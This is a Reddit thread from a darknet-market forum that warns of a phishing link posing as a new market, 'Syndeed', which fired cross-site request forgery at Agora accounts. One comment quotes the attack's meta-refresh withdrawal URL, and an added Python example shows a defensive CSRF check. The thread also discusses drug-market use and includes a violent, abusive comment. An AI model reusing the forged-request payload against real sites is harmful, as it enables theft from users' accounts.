BE CAREFUL OF MESSAGES ON AGORA ABOUT A NEW MARKET CALLED SYNDEED

Got a message from user brandos on Agora about a new market. It doesn't say the name or anything but the guy says he's an old seller and started his own market.

If you open the link, it takes you to Syndeed. I saw that it said I needed to enable javascript for verification process. I thought damn that's not good that you have to enable javascript. Well, I wanted to see if it was anything worth looking at, so I did it.

Immediately after I clicked to open the page, tons of Agora tabs opened up saying "Unable to withdraw amount: 1.0000000", "Unable to withdraw amount: 2.0000000", etc. and there were like at least 20 pages with different amounts. 2.0, 0.5, etc. Luckily I had only like $20 in my account. There were a bunch more tabs opened but they said "you are sending more than 2 requests/min, chill out" or something like that.

Also it initiated a PIN reset, changed my PGP to a link to their site, and maybe even more that I didn't notice. It says PIN reset initiated and I can change it in 19 days. Do I need to worry about anything, or does it just ask me in 19 days to set up a new PIN?

Also is my password compromised or anything? Or am I good?

TLDR: Stay the fuck away from that link and don't click it. And if you do, don't be logged into Agora while you do it!!


Comments


[67 Points] ImLiterallyARetard:

Lol I guess my username checks out....


[18 Points] devinterloper:

The most frustrating part of using DNMs for me, as a web developer, is having to use these really poorly built platforms. Security and usability are seriously lacking on so many of the marketplaces; Agora is vulnerable to the most basic of CSRF attacks: that's really poor... and what is so frustrating about this is that I can't develop my own marketplace without risking my freedom. I would love to develop and deploy a marketplace that solves all these problems (and more) but I can't take the risk... so ultimately my criticisms are wasted because the people behind Agora etc. are willing to take risks I'm not, and they're superior in this market for that reason.


[7 Points] Jay-__:

Damn, this is just such a perfect example why JavaScript is bad.

Upvoted for visibility.

As to your PIN-reset question: sorry, no idea, I never used that.

I'd set the PGP back, change my PW and send a message to support about it all, so they can take actions against that link and also to find out about the PIN-thing.

Or even make a completely fresh account, just to get 100% sure, but still change everything on the old account back and set its profile up with a PGP-signed message stating you switched accounts, so vendors can verify it, if you are worried about losing feedback.

Good luck.

Edit: Please read my other comment in here:

https://www.reddit.com/r/DarkNetMarkets/comments/39cq1e/be_careful_of_messages_on_agora_about_a_new/cs2dx13


[3 Points] TheRealDealMarket:

Didn't think Agora would be vuln to cross-site-request-forgery...


[3 Points] hijacks8890:

I wonder how this attack would be possible, I understand the concept:

It could not even be used to change your Agora credentials and manually withdraw after a pin reset because you would need the user's original password.

How could this attack work? It could not.


[3 Points] asdwadzc:

The function aes_key_verify is called but it doesn't use the AES class, it simply calls the window.open commands for resetting pin and withdrawing using this URL:

http://badURL . oni0n/process?action=send&amount=1&wait=1

That page then uses this to withdraw bitcoins to a random BTC address:

<meta http-equiv="refresh" content="1; URL=http://agoraURL . oni0n /sendbitcoins?targetaddress=RAMDOMADDRESS&withdrawschedule=0&targetamount=1&walletpin=1111&submit=Send">
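
The forged request quoted above works because the withdrawal endpoint acts on a plain GET navigation that carries only the victim's session cookie. As an added example (not part of the original thread and not Agora's code), here is a server-side check that refuses it; `market.example`, `check_state_change` and the `csrf_token` form field are assumptions, while the `/sendbitcoins` path and parameter names are taken from the comment.

```python
import hashlib
import hmac
import secrets
from urllib.parse import parse_qs, urlsplit

SITE_ORIGIN = "http://market.example"  # assumption: the site's own origin
SERVER_KEY = secrets.token_bytes(32)   # server-side secret, never sent to clients

def issue_csrf_token(session_id):
    """Token bound to one session; the site embeds it in the forms it renders."""
    return hmac.new(SERVER_KEY, session_id.encode(), hashlib.sha256).hexdigest()

def check_state_change(method, url, headers, form, session_id):
    """Return (allowed, reason) for a request that moves funds or edits an account."""
    if session_id is None:
        return False, "not logged in"
    # window.open, meta refresh and image loads can only produce GET requests.
    if method != "POST":
        return False, "state change over " + method
    # Action parameters belong in the POST body, never in the query string.
    if parse_qs(urlsplit(url).query):
        return False, "parameters in query string"
    # Origin can be absent (privacy browsers strip it); if present it must be ours.
    origin = headers.get("Origin")
    if origin is not None and origin != SITE_ORIGIN:
        return False, "foreign origin"
    # A third-party page cannot read the victim's token, so it cannot supply it.
    supplied = form.get("csrf_token", "").encode()
    expected = issue_csrf_token(session_id).encode()
    if not hmac.compare_digest(supplied, expected):
        return False, "bad CSRF token"
    return True, "ok"

# Constructed sample requests: (method, url, headers, form)
SESSION = "constructed-session-id"
FORGED_GET = ("GET", SITE_ORIGIN + "/sendbitcoins?targetaddress=PLACEHOLDER"
              "&withdrawschedule=0&targetamount=1&walletpin=1111&submit=Send", {}, {})
FORGED_POST = ("POST", SITE_ORIGIN + "/sendbitcoins", {"Origin": "http://other.example"},
               {"targetamount": "1", "walletpin": "1111"})
GENUINE = ("POST", SITE_ORIGIN + "/sendbitcoins", {"Origin": SITE_ORIGIN},
           {"targetamount": "1", "walletpin": "1111",
            "csrf_token": issue_csrf_token(SESSION)})

if __name__ == "__main__":
    for name, req in (("forged GET", FORGED_GET), ("forged POST", FORGED_POST),
                      ("genuine", GENUINE)):
        print(name, check_state_change(*req, SESSION))
```

The same check applies to the PIN reset and PGP key change the original post describes, since those are state changes as well.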


[2 Points] The_Grid_Is_Up:

Damn, that's a nasty script.


[2 Points] footlockervip:

Damn, that's hardcore.


[2 Points] impost_r:

Ehrrr...... something doesn't add up here, how could it ever withdraw without knowing your PIN? It can't retroactively keylog you or something.


[2 Points] Idonu:

I saw that it said I needed to enable javascript for verification process. I thought damn that's not good that you have to enable javascript. Well, I wanted to see if it was anything worth looking at, so I did it.

Wat....


[2 Points] gramsadmin:

I can't believe Agora, who says they focus so much on security and is always down because they are updating their server, left such an easy exploit open.


[1 Points] kriminale:

Brothers, here is kriminale. I'm not an expert on internet, I'm an expert in drugs, so please, if someone can write what is happening, it would be great bro, thanx


[1 Points] None:

Why is it us god damn Aussies that are always the ones being scammed or doing the scamming. Fucking hell.


[1 Points] gwernisthenewpine:

I'm curious how they got the master account list in the first place. I had another user telling me that there was a dox file floating around with my name on it, which I said was impossible 'cause I've always encrypted. Poked around the link (file hosting site), and turns out they're trying to get people to open an executable file :/ something happened with Agora's database today, I think.. Don't even know who these users are, how do they get access to the master account list?


[1 Points] None:

This is one of the reasons I tell you guys not to enable javascript in your tor browser.

Oh well, sounds like nothing important happened to you. You didn't lose any money cause you didn't have enough for him to want? Good.


[1 Points] blackout86:

Got the same msg, didn't look though.


[1 Points] 3rdthrowayyfoe:

I'm old seller and I would like to invite you to new market.

We are having stable cooperation with sellers. Thanks to the fact we can offer:

We offer clear rules and 24h technical support. Lololol


[1 Points] spike25:

CSRF tokens, these unknowns.


[1 Points] MrSunshine_Agora:

HEY DO YOU SEE WARNING #1 and #2 WTF.

If you're smart you will listen to us, and not Reddit, Sydneed is an Exploit URL, it "IS NOT" a new site.


[1 Points] MrSunshine_Agora:

Is this a Java related issue? I do not have java activated, it doesn't even come up as a plugin, and I had a problem. Do you have another theory?


[0 Points] assiassin:

Change all passwords, change your pgp back, and report to admins if you haven't already. Did it withdraw the btc successfully or did agora's withdraw security catch it in time?


[0 Points] yiddoyiddoyiddo:

Never click any links.


[-2 Points] Str8b8m8ey:

It would not be hard for these guys to test this code they've written. With the amount of effort spent to write it, let's just assume they got it working before blasting it off on marks. If you don't assume that, then get fucked in the face gagging deep throat hard to the point your mouth is bruised and your jaw is fractured. Because that is what it will feel like when you fall for this shit.


[-10 Points] krokodiltear:

Posts like this are incredibly unfair to new marketplaces; you need to independently verify the accuracy of your report at least twice before making these kinds of accusations.

Try depositing another $20 into your Syndeed account and report back with your findings.